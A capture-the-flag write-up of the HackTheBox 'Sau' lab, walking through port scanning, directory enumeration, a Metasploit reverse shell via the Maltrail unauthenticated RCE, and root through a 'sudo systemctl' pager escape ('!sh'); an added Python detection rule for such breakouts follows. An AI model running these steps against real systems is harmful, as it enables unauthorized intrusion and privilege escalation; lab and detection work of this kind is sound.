Inside the Box: Sau HackTheBox Uncovered

0xViKi, published in System Weakness, Nov 7, 2023

Embark on an exhilarating journey as we delve into the electrifying world of hacking, dissecting the “Sau” HackTheBox lab. With nerves of steel and a cunning eye for detail, we uncover hidden secrets within this mysterious domain. Armed with Nmap scans, we hunt for vulnerabilities, paving the path to exhilarating SSRF exploits and spine-tingling RCE attacks. Join me as I infiltrate, escalate, and ultimately conquer the challenge, unraveling the thrilling saga of penetration testing.

Information Gathering:

Initial Scanning:

sudo nmap -sV -sS -A <IP>
[Figure: Nmap scan output]

I ran an Nmap scan to identify open ports and the services running on the target machine. The scan revealed the following information:

  • Port 22 (SSH) is open, running OpenSSH 8.2p1 on an Ubuntu-based system.
  • Port 80 (HTTP) is filtered and not responding.
  • Port 55555 is open, but the service is unknown.

Directory Enumeration:

I used Gobuster to perform directory enumeration on the target’s web server, specifying common file extensions such as .php and .txt:

gobuster dir -u http://<IP>/ -x php,txt -w /usr/share/wordlists/dirb/common.txt -t 50
[Figure: Gobuster directory enumeration output]

The results showed two directories:

  • /demo
  • /web

When I visited the /web directory, I found the "Request Baskets" web service running, version 1.2.1.

In the /demo directory, the server is running Maltrail v0.53, a malicious traffic detection system.

Vulnerability Analysis:

I searched for known exploits related to “Request Baskets” and found a hit: “SSRF on Request-Baskets (CVE-2023-27163).”

Additionally, I discovered an exploit for Maltrail: “Unauthenticated Remote Code Execution (RCE).”

[Figure: Searchsploit search results]

Initial Foothold:

I decided to exploit the Maltrail service using Metasploit. Here are the steps:

  • Launched msfconsole to open Metasploit.
  • Searched for the Maltrail exploit module using the command search maltrail.
  • Selected the appropriate exploit module (e.g., use 0).
  • Checked the available options using show options.

[Figure: Metasploit console]

  • Set the target IP using set RHOST <IP>.
  • Set the target port to 55555 using set RPORT 55555.
  • Specified the target URI as /demo with set TARGETURI /demo.
  • Set the listener IP (LHOST) and port (LPORT) for the reverse shell.

[Figure: options set for the exploit]

  • Finally, executed the exploit using run.

[Figure: listener started]

As a result, I successfully obtained a Meterpreter session, gaining initial access to the target machine.

[Figure: Meterpreter session]

[Figure: user flag]

Privilege Escalation:

I executed sudo -l to check if there was any command that could be performed as sudo without a password.

[Figure: sudo -l output]

I discovered that I could run systemctl with sudo, so I visited GTFOBins and obtained the privilege escalation technique to break out of the environment and gain root access.

# Execute 
sudo /usr/bin/systemctl status trail.service

# Break environment
!sh

This action granted me root privileges, effectively taking control of the system.

[Figure: privilege escalation to root]
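The breakout above leaves a distinctive process lineage on the host: sudo runs systemctl, systemctl forks the less pager, and the "!sh" escape makes less spawn a shell that inherits root. The detection below is an added example, not part of the original writeup; it walks process-creation records and flags a root shell whose parent is a pager with sudo somewhere in its ancestry. The ProcEvent record shape and the sample events are assumptions, a constructed, simplified stand-in for auditd or EDR process telemetry.

```python
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record (constructed, simplified auditd-style view)."""
    pid: int
    ppid: int
    uid: int      # effective uid of the new process
    comm: str     # executable name
    cmdline: str


PAGERS = {"less", "more", "pager"}
SHELLS = {"sh", "bash", "dash", "zsh"}

# Constructed sample: puma runs the sudo systemctl rule from the writeup and
# types "!sh" in the pager; a second, benign pager-to-shell chain runs as puma.
SAMPLE_EVENTS = [
    ProcEvent(1000, 999, 1001, "bash", "-bash"),
    ProcEvent(1010, 1000, 0, "sudo", "sudo /usr/bin/systemctl status trail.service"),
    ProcEvent(1011, 1010, 0, "systemctl", "/usr/bin/systemctl status trail.service"),
    ProcEvent(1012, 1011, 0, "less", "/usr/bin/less"),   # pager forked by systemctl
    ProcEvent(1013, 1012, 0, "sh", "sh -c sh"),          # "!sh" typed in the pager
    ProcEvent(1020, 1000, 1001, "less", "less /etc/hosts"),
    ProcEvent(1021, 1020, 1001, "sh", "sh -c sh"),       # same pattern, but not root
]


def ancestry(event, by_pid, max_depth=8):
    """Walk parent links upward (bounded, since records may be incomplete)."""
    chain = []
    while event is not None and len(chain) < max_depth:
        chain.append(event)
        event = by_pid.get(event.ppid)
    return chain


def find_pager_breakouts(events):
    """Return a 'parent -> ... -> shell' string for every root shell whose
    parent is a pager and whose ancestry includes sudo."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if e.comm not in SHELLS or e.uid != 0:
            continue
        pager = by_pid.get(e.ppid)
        if pager is None or pager.comm not in PAGERS:
            continue
        chain = ancestry(pager, by_pid)
        if any(a.comm == "sudo" for a in chain):
            hits.append(" -> ".join(a.comm for a in reversed(chain)) + f" -> {e.comm}")
    return hits


if __name__ == "__main__":
    for hit in find_pager_breakouts(SAMPLE_EVENTS):
        print("ALERT pager breakout:", hit)
```

Restricting the sudo rule to a pager-free invocation such as systemctl status --no-pager removes the lineage this rule looks for in the first place.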

Finally, I retrieved the user and root flags:

  • The user flag is located at /home/puma/user.txt
  • The root flag is located at /root/root.txt

I successfully compromised the Sau HackTheBox lab, obtained user and root privileges, and retrieved both the user and root flags.
